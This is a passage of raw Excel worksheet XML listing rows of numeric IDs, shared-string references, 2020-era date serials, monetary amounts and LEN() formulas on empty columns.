        <v>9516</v>
      </c>
      <c r="E1642">
        <v>14</v>
      </c>
      <c r="F1642" t="s">
        <v>9519</v>
      </c>
      <c r="G1642" s="1">
        <v>43873</v>
      </c>
      <c r="H1642">
        <v>100000</v>
      </c>
      <c r="K1642">
        <f>LEN(I1642)</f>
        <v>0</v>
      </c>
      <c r="L1642">
        <f>LEN(J1642)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1643" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1643">
        <v>16892</v>
      </c>
      <c r="B1643">
        <v>1381</v>
      </c>
      <c r="C1643" t="s">
        <v>2504</v>
      </c>
      <c r="D1643" t="s">
        <v>9549</v>
      </c>
      <c r="E1643">
        <v>11</v>
      </c>
      <c r="F1643" t="s">
        <v>512</v>
      </c>
      <c r="G1643" s="1">
        <v>43913</v>
      </c>
      <c r="H1643">
        <v>500</v>
      </c>
      <c r="K1643">
        <f>LEN(I1643)</f>
        <v>0</v>
      </c>
      <c r="L1643">
        <f>LEN(J1643)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1644" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1644">
        <v>16898</v>
      </c>
      <c r="B1644">
        <v>1381</v>
      </c>
      <c r="C1644" t="s">
        <v>2504</v>
      </c>
      <c r="D1644" t="s">
        <v>9549</v>
      </c>
      <c r="E1644">
        <v>11</v>
      </c>
      <c r="F1644" t="s">
        <v>9559</v>
      </c>
      <c r="G1644" s="1">
        <v>43913</v>
      </c>
      <c r="H1644">
        <v>500</v>
      </c>
      <c r="K1644">
        <f>LEN(I1644)</f>
        <v>0</v>
      </c>
      <c r="L1644">
        <f>LEN(J1644)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1645" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1645">
        <v>16904</v>
      </c>
      <c r="B1645">
        <v>2277</v>
      </c>
      <c r="C1645" t="s">
        <v>4703</v>
      </c>
      <c r="D1645" t="s">
        <v>9564</v>
      </c>
      <c r="E1645">
        <v>26</v>
      </c>
      <c r="F1645" t="s">
        <v>1746</v>
      </c>
      <c r="G1645" s="1">
        <v>43845</v>
      </c>
      <c r="H1645">
        <v>100000</v>
      </c>
      <c r="K1645">
        <f>LEN(I1645)</f>
        <v>0</v>
      </c>
      <c r="L1645">
        <f>LEN(J1645)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1646" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1646">
        <v>16905</v>
      </c>
      <c r="B1646">
        <v>2277</v>
      </c>
      <c r="C1646" t="s">
        <v>4703</v>
      </c>
      <c r="D1646" t="s">
        <v>9564</v>
      </c>
      <c r="E1646">
        <v>26</v>
      </c>
      <c r="F1646" t="s">
        <v>9565</v>
      </c>
      <c r="G1646" s="1">
        <v>43845</v>
      </c>
      <c r="H1646">
        <v>50000</v>
      </c>
      <c r="K1646">
        <f>LEN(I1646)</f>
        <v>0</v>
      </c>
      <c r="L1646">
        <f>LEN(J1646)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1647" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1647">
        <v>16906</v>
      </c>
      <c r="B1647">
        <v>2277</v>
      </c>
      <c r="C1647" t="s">
        <v>4703</v>
      </c>
      <c r="D1647" t="s">
        <v>9564</v>
      </c>
      <c r="E1647">
        <v>26</v>
      </c>
      <c r="F1647" t="s">
        <v>9566</v>
      </c>
      <c r="G1647" s="1">
        <v>43845</v>
      </c>
      <c r="H1647">
        <v>50000</v>
      </c>
      <c r="K1647">
        <f>LEN(I1647)</f>
        <v>0</v>
      </c>
      <c r="L1647">
        <f>LEN(J1647)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1648" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1648">
        <v>16907</v>
      </c>
      <c r="B1648">
        <v>2277</v>
      </c>
      <c r="C1648" t="s">
        <v>4703</v>
      </c>
      <c r="D1648" t="s">
        <v>9564</v>
      </c>
      <c r="E1648">
        <v>26</v>
      </c>
      <c r="F1648" t="s">
        <v>9567</v>
      </c>
      <c r="G1648" s="1">
        <v>43845</v>
      </c>
      <c r="H1648">
        <v>20000</v>
      </c>
      <c r="K1648">
        <f>LEN(I1648)</f>
        <v>0</v>
      </c>
      <c r="L1648">
        <f>LEN(J1648)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1649" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1649">
        <v>16909</v>
      </c>
      <c r="B1649">
        <v>259</v>
      </c>
      <c r="C1649" t="s">
        <v>1267</v>
      </c>
      <c r="D1649" t="s">
        <v>9568</v>
      </c>
      <c r="E1649">
        <v>16</v>
      </c>
      <c r="F1649" t="s">
        <v>7241</v>
      </c>
      <c r="G1649" s="1">
        <v>43963</v>
      </c>
      <c r="H1649">
        <v>26980</v>
      </c>
      <c r="K1649">
        <f>LEN(I1649)</f>
        <v>0</v>
      </c>
      <c r="L1649">
        <f>LEN(J1649)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1650" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1650">
        <v>16910</v>
      </c>
      <c r="B1650">
        <v>1568</v>
      </c>
      <c r="C1650" t="s">
        <v>2659</v>
      </c>
      <c r="D1650" t="s">
        <v>9569</v>
      </c>
      <c r="E1650">
        <v>26</v>
      </c>
      <c r="F1650" t="s">
        <v>5434</v>
      </c>
      <c r="G1650" s="1">
        <v>43851</v>
      </c>
      <c r="H1650">
        <v>40000</v>
      </c>
      <c r="K1650">
        <f>LEN(I1650)</f>
        <v>0</v>
      </c>
      <c r="L1650">
        <f>LEN(J1650)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1651" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1651">
        <v>16914</v>
      </c>
      <c r="B1651">
        <v>2304</v>
      </c>
      <c r="C1651" t="s">
        <v>5389</v>
      </c>
      <c r="D1651" t="s">
        <v>9574</v>
      </c>
      <c r="E1651">
        <v>16</v>
      </c>
      <c r="F1651" t="s">
        <v>364</v>
      </c>
      <c r="G1651" s="1">
        <v>43885</v>
      </c>
      <c r="H1651">
        <v>21000</v>
      </c>
      <c r="K1651">
        <f>LEN(I1651)</f>
        <v>0</v>
      </c>
      <c r="L1651">
        <f>LEN(J1651)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1652" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1652">
        <v>16915</v>
      </c>
      <c r="B1652">
        <v>958</v>
      </c>
      <c r="C1652" t="s">
        <v>2572</v>
      </c>
      <c r="D1652" t="s">
        <v>9575</v>
      </c>
      <c r="E1652">
        <v>16</v>
      </c>
      <c r="F1652" t="s">
        <v>1746</v>
      </c>
      <c r="G1652" s="1">
        <v>44182</v>
      </c>
      <c r="H1652">
        <v>0</v>
      </c>
      <c r="K1652">
        <f>LEN(I1652)</f>
        <v>0</v>
      </c>
      <c r="L1652">
        <f>LEN(J1652)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1653" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1653">
        <v>16916</v>
      </c>
      <c r="B1653">
        <v>1756</v>
      </c>
      <c r="C1653" t="s">
        <v>6228</v>
      </c>
      <c r="D1653" t="s">
        <v>9576</v>
      </c>
      <c r="E1653">
        <v>28</v>
      </c>
      <c r="F1653" t="s">
        <v>9466</v>
      </c>
      <c r="G1653" s="1">
        <v>43875</v>
      </c>
      <c r="H1653">
        <v>10000</v>
      </c>
      <c r="K1653">
        <f>LEN(I1653)</f>
        <v>0</v>
      </c>
      <c r="L1653">
        <f>LEN(J1653)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1654" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1654">
        <v>16917</v>
      </c>
      <c r="B1654">
        <v>1756</v>
      </c>
      <c r="C1654" t="s">
        <v>6228</v>
      </c>
      <c r="D1654" t="s">
        <v>9576</v>
      </c>
      <c r="E1654">
        <v>28</v>
      </c>
      <c r="F1654" t="s">
        <v>9577</v>
      </c>
      <c r="G1654" s="1">
        <v>43875</v>
      </c>
      <c r="H1654">
        <v>10000</v>
      </c>
      <c r="K1654">
        <f>LEN(I1654)</f>
        <v>0</v>
      </c>
      <c r="L1654">
        <f>LEN(J1654)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1655" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1655">
        <v>16918</v>
      </c>
      <c r="B1655">
        <v>1756</v>
      </c>
      <c r="C1655" t="s">
        <v>6228</v>
      </c>
      <c r="D1655" t="s">
        <v>9576</v>
      </c>
      <c r="E1655">
        <v>28</v>
      </c>
      <c r="F1655" t="s">
        <v>9435</v>
      </c>
      <c r="G1655" s="1">
        <v>43875</v>
      </c>
      <c r="H1655">
        <v>10000</v>
      </c>
      <c r="K1655">
        <f>LEN(I1655)</f>
        <v>0</v>
      </c>
      <c r="L1655">
        <f>LEN(J1655)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1656" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1656">
        <v>16919</v>
      </c>
      <c r="B1656">
        <v>1756</v>
      </c>
      <c r="C1656" t="s">
        <v>6228</v>
      </c>
      <c r="D1656" t="s">
        <v>9576</v>
      </c>
      <c r="E1656">
        <v>28</v>
      </c>
      <c r="F1656" t="s">
        <v>9578</v>
      </c>
      <c r="G1656" s="1">
        <v>43875</v>
      </c>
      <c r="H1656">
        <v>10000</v>
      </c>
      <c r="K1656">
        <f>LEN(I1656)</f>
        <v>0</v>
      </c>
      <c r="L1656">
        <f>LEN(J1656)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1657" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1657">
        <v>16920</v>
      </c>
      <c r="B1657">
        <v>1756</v>
      </c>
      <c r="C1657" t="s">
        <v>6228</v>
      </c>
      <c r="D1657" t="s">
        <v>9576</v>
      </c>
      <c r="E1657">
        <v>28</v>
      </c>
      <c r="F1657" t="s">
        <v>9579</v>
      </c>
      <c r="G1657" s="1">
        <v>43875</v>
      </c>
      <c r="H1657">
        <v>10000</v>
      </c>
      <c r="K1657">
        <f>LEN(I1657)</f>
        <v>0</v>
      </c>
      <c r="L1657">
        <f>LEN(J1657)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1658" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1658">
        <v>16927</v>
      </c>
      <c r="B1658">
        <v>246</v>
      </c>
      <c r="C1658" t="s">
        <v>2447</v>
      </c>
      <c r="D1658" t="s">
        <v>9580</v>
      </c>
      <c r="E1658">
        <v>16</v>
      </c>
      <c r="F1658" t="s">
        <v>7241</v>
      </c>
      <c r="G1658" s="1">
        <v>43847</v>
      </c>
      <c r="H1658">
        <v>1000</v>
      </c>
      <c r="K1658">
        <f>LEN(I1658)</f>
        <v>0</v>
      </c>
      <c r="L1658">
        <f>LEN(J1658)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1659" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1659">
        <v>16928</v>
      </c>
      <c r="B1659">
        <v>1570</v>
      </c>
      <c r="C1659" t="s">
        <v>4382</v>
      </c>
      <c r="D1659" t="s">
        <v>9581</v>
      </c>
      <c r="E1659">
        <v>33</v>
      </c>
      <c r="F1659" t="s">
        <v>9582</v>
      </c>
      <c r="G1659" s="1">
        <v>43854</v>
      </c>
      <c r="H1659">
        <v>500000</v>
      </c>
      <c r="K1659">
        <f>LEN(I1659)</f>
        <v>0</v>
      </c>
      <c r="L1659">
        <f>LEN(J1659)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1660" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1660">
        <v>16929</v>
      </c>
      <c r="B1660">
        <v>1570</v>
      </c>
      <c r="C1660" t="s">
        <v>4382</v>
      </c>
      <c r="D1660" t="s">
        <v>9581</v>
      </c>
      <c r="E1660">
        <v>33</v>
      </c>
      <c r="F1660" t="s">
        <v>9583</v>
      </c>
      <c r="G1660" s="1">
        <v>43854</v>
      </c>
      <c r="H1660">
        <v>500</v>
      </c>
      <c r="K1660">
        <f>LEN(I1660)</f>
        <v>0</v>
      </c>
      <c r="L1660">
        <f>LEN(J1660)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1661" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1661">
        <v>16948</v>
      </c>
      <c r="B1661">
        <v>2308</v>
      </c>
      <c r="C1661" t="s">
        <v>5579</v>
      </c>
      <c r="D1661" t="s">
        <v>9584</v>
      </c>
      <c r="E1661">
        <v>29</v>
      </c>
      <c r="F1661" t="s">
        <v>1455</v>
      </c>
      <c r="G1661" s="1">
        <v>43858</v>
      </c>
      <c r="H1661">
        <v>0</v>
      </c>
      <c r="K1661">
        <f>LEN(I1661)</f>
        <v>0</v>
      </c>
      <c r="L1661">
        <f>LEN(J1661)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1662" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1662">
        <v>16960</v>
      </c>
      <c r="B1662">
        <v>2083</v>
      </c>
      <c r="C1662" t="s">
        <v>16389</v>
      </c>
      <c r="D1662" t="s">
        <v>16390</v>
      </c>
      <c r="E1662">
        <v>5</v>
      </c>
      <c r="F1662" t="s">
        <v>9588</v>
      </c>
      <c r="G1662" s="1">
        <v>44074</v>
      </c>
      <c r="H1662" s="4">
        <v>5000</v>
      </c>
      <c r="K1662">
        <f>LEN(I1662)</f>
        <v>0</v>
      </c>
      <c r="L1662">
        <f>LEN(J1662)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1663" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1663">
        <v>16961</v>
      </c>
      <c r="B1663">
        <v>2083</v>
      </c>
      <c r="C1663" t="s">
        <v>16389</v>
      </c>
      <c r="D1663" t="s">
        <v>16390</v>
      </c>
      <c r="E1663">
        <v>5</v>
      </c>
      <c r="F1663" t="s">
        <v>9589</v>
      </c>
      <c r="G1663" s="1">
        <v>44074</v>
      </c>
      <c r="H1663" s="4">
        <v>20000</v>
      </c>
      <c r="K1663">
        <f>LEN(I1663)</f>
        <v>0</v>
      </c>
      <c r="L1663">
        <f>LEN(J1663)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1664" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1664">
        <v>16962</v>
      </c>
      <c r="B1664">
        <v>2083</v>
      </c>
      <c r="C1664" t="s">
        <v>16389</v>
      </c>
      <c r="D1664" t="s">
        <v>16390</v>
      </c>
      <c r="E1664">
        <v>5</v>
      </c>
      <c r="F1664" t="s">
        <v>9590</v>
      </c>
      <c r="G1664" s="1">
        <v>44074</v>
      </c>
      <c r="H1664" s="4">
        <v>5000</v>
      </c>
      <c r="K1664">
        <f>LEN(I1664)</f>
        <v>0</v>
      </c>
      <c r="L1664">
        <f>LEN(J1664)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1665" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1665">
        <v>16963</v>
      </c>
      <c r="B1665">
        <v>2083</v>
      </c>
      <c r="C1665" t="s">
        <v>16389</v>
      </c>
      <c r="D1665" t="s">
        <v>16390</v>
      </c>
      <c r="E1665">
        <v>5</v>
      </c>
      <c r="F1665" t="s">
        <v>9591</v>
      </c>
      <c r="G1665" s="1">
        <v>44074</v>
      </c>
      <c r="H1665" s="4">
        <v>25000</v>
      </c>
      <c r="K1665">
        <f>LEN(I1665)</f>
        <v>0</v>
      </c>
      <c r="L1665">
        <f>LEN(J1665)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1666" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1666">
        <v>16964</v>
      </c>
      <c r="B1666">
        <v>2083</v>
      </c>
      <c r="C1666" t="s">
        <v>16389</v>
      </c>
      <c r="D1666" t="s">
        <v>16390</v>
      </c>
      <c r="E1666">
        <v>5</v>
      </c>
      <c r="F1666" t="s">
        <v>9592</v>
      </c>
      <c r="G1666" s="1">
        <v>44074</v>
      </c>
      <c r="H1666" s="4">
        <v>50000</v>
      </c>
      <c r="K1666">
        <f>LEN(I1666)</f>
        <v>0</v>
      </c>
      <c r="L1666">
        <f>LEN(J1666)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1667" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1667">
        <v>16966</v>
      </c>
      <c r="B1667">
        <v>2083</v>
      </c>
      <c r="C1667" t="s">
        <v>6246</v>
      </c>
      <c r="D1667" t="s">
        <v>9587</v>
      </c>
      <c r="E1667">
        <v>5</v>
      </c>
      <c r="F1667" t="s">
        <v>9593</v>
      </c>
      <c r="G1667" s="1">
        <v>44074</v>
      </c>
      <c r="H1667">
        <v>5000</v>
      </c>
      <c r="K1667">
        <f>LEN(I1667)</f>
        <v>0</v>
      </c>
      <c r="L1667">
        <f>LEN(J1667)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1668" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1668">
        <v>16971</v>
      </c>
      <c r="B1668">
        <v>2332</v>
      </c>
      <c r="C1668" t="s">
        <v>5974</v>
      </c>
      <c r="D1668" t="s">
        <v>9594</v>
      </c>
      <c r="E1668">
        <v>13</v>
      </c>
      <c r="F1668" t="s">
        <v>9595</v>
      </c>
      <c r="G1668" s="1">
        <v>44000</v>
      </c>
      <c r="H1668">
        <v>100000</v>
      </c>
      <c r="K1668">
        <f>LEN(I1668)</f>
        <v>0</v>
      </c>
      <c r="L1668">
        <f>LEN(J1668)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1669" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1669">
        <v>16976</v>
      </c>
      <c r="B1669">
        <v>1915</v>
      </c>
      <c r="C1669" t="s">
        <v>6728</v>
      </c>
      <c r="D1669" t="s">
        <v>9596</v>
      </c>
      <c r="E1669">
        <v>16</v>
      </c>
      <c r="F1669" t="s">
        <v>6730</v>
      </c>
      <c r="G1669" s="1">
        <v>43882</v>
      </c>
      <c r="H1669">
        <v>2500</v>
      </c>
      <c r="K1669">
        <f>LEN(I1669)</f>
        <v>0</v>
      </c>
      <c r="L1669">
        <f>LEN(J1669)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1670" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1670">
        <v>16980</v>
      </c>
      <c r="B1670">
        <v>524</v>
      </c>
      <c r="C1670" t="s">
        <v>2307</v>
      </c>
      <c r="D1670" t="s">
        <v>9599</v>
      </c>
      <c r="E1670">
        <v>33</v>
      </c>
      <c r="F1670" t="s">
        <v>3763</v>
      </c>
      <c r="G1670" s="1">
        <v>43852</v>
      </c>
      <c r="H1670">
        <v>4467</v>
      </c>
      <c r="K1670">
        <f>LEN(I1670)</f>
        <v>0</v>
      </c>
      <c r="L1670">
        <f>LEN(J1670)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1671" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1671">
        <v>16983</v>
      </c>
      <c r="B1671">
        <v>2298</v>
      </c>
      <c r="C1671" t="s">
        <v>6807</v>
      </c>
      <c r="D1671" t="s">
        <v>9600</v>
      </c>
      <c r="E1671">
        <v>29</v>
      </c>
      <c r="F1671" t="s">
        <v>6917</v>
      </c>
      <c r="G1671" s="1">
        <v>43866</v>
      </c>
      <c r="H1671">
        <v>20000</v>
      </c>
      <c r="K1671">
        <f>LEN(I1671)</f>
        <v>0</v>
      </c>
      <c r="L1671">
        <f>LEN(J1671)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1672" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1672">
        <v>16984</v>
      </c>
      <c r="B1672">
        <v>2298</v>
      </c>
      <c r="C1672" t="s">
        <v>6807</v>
      </c>
      <c r="D1672" t="s">
        <v>9600</v>
      </c>
      <c r="E1672">
        <v>29</v>
      </c>
      <c r="F1672" t="s">
        <v>4686</v>
      </c>
      <c r="G1672" s="1">
        <v>43866</v>
      </c>
      <c r="H1672">
        <v>30000</v>
      </c>
      <c r="K1672">
        <f>LEN(I1672)</f>
        <v>0</v>
      </c>
      <c r="L1672">
        <f>LEN(J1672)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1673" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1673">
        <v>16986</v>
      </c>
      <c r="B1673">
        <v>2538</v>
      </c>
      <c r="C1673" t="s">
        <v>4142</v>
      </c>
      <c r="D1673" t="s">
        <v>9601</v>
      </c>
      <c r="E1673">
        <v>2</v>
      </c>
      <c r="F1673" t="s">
        <v>9602</v>
      </c>
      <c r="G1673" s="1">
        <v>43896</v>
      </c>
      <c r="H1673">
        <v>50000</v>
      </c>
      <c r="K1673">
        <f>LEN(I1673)</f>
        <v>0</v>
      </c>
      <c r="L1673">
        <f>LEN(J1673)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1674" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1674">
        <v>16989</v>
      </c>
      <c r="B1674">
        <v>2273</v>
      </c>
      <c r="C1674" t="s">
        <v>6260</v>
      </c>
      <c r="D1674" t="s">
        <v>9604</v>
      </c>
      <c r="E1674">
        <v>16</v>
      </c>
      <c r="F1674" t="s">
        <v>547</v>
      </c>
      <c r="G1674" s="1">
        <v>43907</v>
      </c>
      <c r="H1674">
        <v>20000</v>
      </c>
      <c r="K1674">
        <f>LEN(I1674)</f>
        <v>0</v>
      </c>
      <c r="L1674">
        <f>LEN(J1674)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1675" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1675">
        <v>16990</v>
      </c>
      <c r="B1675">
        <v>2273</v>
      </c>
      <c r="C1675" t="s">
        <v>6260</v>
      </c>
      <c r="D1675" t="s">
        <v>9604</v>
      </c>
      <c r="E1675">
        <v>16</v>
      </c>
      <c r="F1675" t="s">
        <v>9453</v>
      </c>
      <c r="G1675" s="1">
        <v>43907</v>
      </c>
      <c r="H1675">
        <v>15000</v>
      </c>
      <c r="K1675">
        <f>LEN(I1675)</f>
        <v>0</v>
      </c>
      <c r="L1675">
        <f>LEN(J1675)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1676" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1676">
        <v>16991</v>
      </c>
      <c r="B1676">
        <v>20</v>
      </c>
      <c r="C1676" t="s">
        <v>1806</v>
      </c>
      <c r="D1676" t="s">
        <v>9605</v>
      </c>
      <c r="E1676">
        <v>22</v>
      </c>
      <c r="F1676" t="s">
        <v>9437</v>
      </c>
      <c r="G1676" s="1">
        <v>44351</v>
      </c>
      <c r="H1676">
        <v>25000</v>
      </c>
      <c r="K1676">
        <f>LEN(I1676)</f>
        <v>0</v>
      </c>
      <c r="L1676">
        <f>LEN(J1676)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1677" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1677">
        <v>16992</v>
      </c>
      <c r="B1677">
        <v>1310</v>
      </c>
      <c r="C1677" t="s">
        <v>2473</v>
      </c>
      <c r="D1677" t="s">
        <v>9507</v>
      </c>
      <c r="E1677">
        <v>16</v>
      </c>
      <c r="F1677" t="s">
        <v>1746</v>
      </c>
      <c r="G1677" s="1">
        <v>43987</v>
      </c>
      <c r="H1677">
        <v>200000</v>
      </c>
      <c r="K1677">
        <f>LEN(I1677)</f>
        <v>0</v>
      </c>
      <c r="L1677">
        <f>LEN(J1677)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1678" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1678">
        <v>16993</v>
      </c>
      <c r="B1678">
        <v>2345</v>
      </c>
      <c r="C1678" t="s">
        <v>4803</v>
      </c>
      <c r="D1678" t="s">
        <v>9606</v>
      </c>
      <c r="E1678">
        <v>29</v>
      </c>
      <c r="F1678" t="s">
        <v>4686</v>
      </c>
      <c r="G1678" s="1">
        <v>43840</v>
      </c>
      <c r="H1678">
        <v>500000</v>
      </c>
      <c r="K1678">
        <f>LEN(I1678)</f>
        <v>0</v>
      </c>
      <c r="L1678">
        <f>LEN(J1678)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1679" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1679">
        <v>16994</v>
      </c>
      <c r="B1679">
        <v>2345</v>
      </c>
      <c r="C1679" t="s">
        <v>4803</v>
      </c>
      <c r="D1679" t="s">
        <v>9607</v>
      </c>
      <c r="E1679">
        <v>29</v>
      </c>
      <c r="F1679" t="s">
        <v>2236</v>
      </c>
      <c r="G1679" s="1">
        <v>43840</v>
      </c>
      <c r="H1679">
        <v>500000</v>
      </c>
      <c r="K1679">
        <f>LEN(I1679)</f>
        <v>0</v>
      </c>
      <c r="L1679">
        <f>LEN(J1679)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1680" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1680">
        <v>16995</v>
      </c>
      <c r="B1680">
        <v>360</v>
      </c>
      <c r="C1680" t="s">
        <v>233</v>
      </c>
      <c r="D1680" t="s">
        <v>9608</v>
      </c>
      <c r="E1680">
        <v>12</v>
      </c>
      <c r="F1680" t="s">
        <v>9459</v>
      </c>
      <c r="G1680" s="1">
        <v>43873</v>
      </c>
      <c r="H1680">
        <v>250000</v>
      </c>
      <c r="K1680">
        <f>LEN(I1680)</f>
        <v>0</v>
      </c>
      <c r="L1680">
        <f>LEN(J1680)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1681" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1681">
        <v>17007</v>
      </c>
      <c r="B1681">
        <v>2295</v>
      </c>
      <c r="C1681" t="s">
        <v>4913</v>
      </c>
      <c r="D1681" t="s">
        <v>9609</v>
      </c>
      <c r="E1681">
        <v>2</v>
      </c>
      <c r="F1681" t="s">
        <v>1746</v>
      </c>
      <c r="G1681" s="1">
        <v>43900</v>
      </c>
      <c r="H1681">
        <v>100000</v>
      </c>
      <c r="K1681">
        <f>LEN(I1681)</f>
        <v>0</v>
      </c>
      <c r="L1681">
        <f>LEN(J1681)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1682" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1682">
        <v>17012</v>
      </c>
      <c r="B1682">
        <v>1444</v>
      </c>
      <c r="C1682" t="s">
        <v>16360</v>
      </c>
      <c r="D1682" t="s">
        <v>16361</v>
      </c>
      <c r="E1682">
        <v>26</v>
      </c>
      <c r="F1682" t="s">
        <v>132</v>
      </c>
      <c r="G1682" s="1">
        <v>43880</v>
      </c>
      <c r="H1682" s="4">
        <v>3650000</v>
      </c>
      <c r="K1682">
        <f>LEN(I1682)</f>
        <v>0</v>
      </c>
      <c r="L1682">
        <f>LEN(J1682)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1683" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1683">
        <v>17020</v>
      </c>
      <c r="B1683">
        <v>459</v>
      </c>
      <c r="C1683" t="s">
        <v>1143</v>
      </c>
      <c r="D1683" t="s">
        <v>9627</v>
      </c>
      <c r="E1683">
        <v>16</v>
      </c>
      <c r="F1683" t="s">
        <v>2236</v>
      </c>
      <c r="G1683" s="1">
        <v>43935</v>
      </c>
      <c r="H1683">
        <v>6240000</v>
      </c>
      <c r="K1683">
        <f>LEN(I1683)</f>
        <v>0</v>
      </c>
      <c r="L1683">
        <f>LEN(J1683)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1684" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1684">
        <v>17021</v>
      </c>
      <c r="B1684">
        <v>459</v>
      </c>
      <c r="C1684" t="s">
        <v>1143</v>
      </c>
      <c r="D1684" t="s">
        <v>9627</v>
      </c>
      <c r="E1684">
        <v>16</v>
      </c>
      <c r="F1684" t="s">
        <v>2105</v>
      </c>
      <c r="G1684" s="1">
        <v>43935</v>
      </c>
      <c r="H1684">
        <v>9360000</v>
      </c>
      <c r="K1684">
        <f>LEN(I1684)</f>
        <v>0</v>
      </c>
      <c r="L1684">
        <f>LEN(J1684)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1685" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1685">
        <v>17023</v>
      </c>
      <c r="B1685">
        <v>459</v>
      </c>
      <c r="C1685" t="s">
        <v>1143</v>
      </c>
      <c r="D1685" t="s">
        <v>9627</v>
      </c>
      <c r="E1685">
        <v>16</v>
      </c>
      <c r="F1685" t="s">
        <v>945</v>
      </c>
      <c r="G1685" s="1">
        <v>43935</v>
      </c>
      <c r="H1685">
        <v>4680000</v>
      </c>
      <c r="K1685">
        <f>LEN(I1685)</f>
        <v>0</v>
      </c>
      <c r="L1685">
        <f>LEN(J1685)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1686" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1686">
        <v>17029</v>
      </c>
      <c r="B1686">
        <v>1598</v>
      </c>
      <c r="C1686" t="s">
        <v>2703</v>
      </c>
      <c r="D1686" t="s">
        <v>9630</v>
      </c>
      <c r="E1686">
        <v>26</v>
      </c>
      <c r="F1686" t="s">
        <v>9631</v>
      </c>
      <c r="G1686" s="1">
        <v>43851</v>
      </c>
      <c r="H1686">
        <v>300000</v>
      </c>
      <c r="K1686">
        <f>LEN(I1686)</f>
        <v>0</v>
      </c>
      <c r="L1686">
        <f>LEN(J1686)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1687" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1687">
        <v>17030</v>
      </c>
      <c r="B1687">
        <v>1598</v>
      </c>
      <c r="C1687" t="s">
        <v>2703</v>
      </c>
      <c r="D1687" t="s">
        <v>9630</v>
      </c>
      <c r="E1687">
        <v>26</v>
      </c>
      <c r="F1687" t="s">
        <v>9632</v>
      </c>
      <c r="G1687" s="1">
        <v>43851</v>
      </c>
